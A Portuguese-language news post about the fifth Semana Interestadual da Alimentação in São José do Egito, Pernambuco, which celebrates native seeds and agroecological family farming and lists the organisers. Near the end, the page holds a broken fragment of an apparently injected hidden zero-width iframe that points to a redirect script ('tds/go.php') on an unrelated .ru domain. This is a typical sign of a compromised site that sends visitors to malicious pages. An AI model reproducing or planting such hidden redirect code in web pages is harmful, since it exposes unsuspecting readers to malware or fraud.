Dia da Alimentação [16/10] é celebrado com semana de atividades no Sertão do Pajeú – PE

Dia da Alimentação [16/10] é celebrado com semana de atividades no Sertão do Pajeú [PE]
Compartilhe!


De 16 a 20 de outubro acontece a V Semana Interestadual da Alimentação (Seia), na cidade de São José do Egito, na região do Sertão do Pajeú, em Pernambuco. O evento celebra a mudança de vida de muitas famílias do sertão pernambucano e de outros estados, através do resgate de práticas agroecológicas que permitem a convivência com o clima da região.

A V Seia comemora o Dia Mundial da Alimentação (16 de outubro) que, tradicionalmente, é celebrado na região. O evento é referência para a sociedade nordestina porque reafirma um trabalho de muitos anos do fortalecimento da agricultura familiar agroecológica.
+
Este ano, o tema escolhido é Sementes nativas: presente de Deus para a continuidade da vida. Os agricultores e agricultoras do Semi-Árido têm a cultura de estocar sementes há muitos anos para conservar suas espécies nativas, garantindo a segurança alimentar da família.

Junto ao armazenamento das sementes, também está sendo guardado o conhecimento construído pelas próprias famílias no cultivo da semente e no uso das plantas. Esse saber é repassado de geração em geração. Isso é de extrema importância e faz das sementes nativas um patrimônio genético e cultural do povo do Semi-Árido.

Na programação da V Seia haverá palestras sobre agrobiodiversidade, seminários, visitas de intercâmbio, encontro de formação sobre bancos de sementes comunitários, entre outras atividades.+

O encerramento do evento (20) será na feira agroecológica de São José do Egito. Esse momento contará com participações de artistas da cultura popular, troca de sementes e comercialização de produtos da agricultura familiar agroecológica.
+
A Seia é uma realização das organizações da sociedade civil Diaconia, Centro Sabiá, Caatinga e Casa da Mulher do Nordeste, e conta como apoio da Misereor, Projeto Dom Helder Câmara, Associação Agroecológica Sertão do Pajeú (AASP), Prefeitura Municipal de São José do Egito (Secretarias de Agricultura e Educação), Escola Edson Simões, Escola Sebastião Rabelo, Grêmios Estudantis, Paróquia São José, Sindicato dos Trabalhadores Rurais de São José do Egito, Associação dos Apicultores e Meliponicultores Orgânicos do Alto Pajeú, Igreja Batista Betel, Sindicato dos Trabalhadores da Educação de Pernambuco (Sintepe), Pastoral da Terra (CPT) e o Pólo Sindical e das Organizações da Agricultura Familiar da Borborema.


*Ita Porto é técnica do Programa de Apoio à Agricultura Familiar+ (PAAF) da Diaconia no Sertão do Pajeú (PE).


Clique aqui e confira a programação completa

rc=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ hei

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *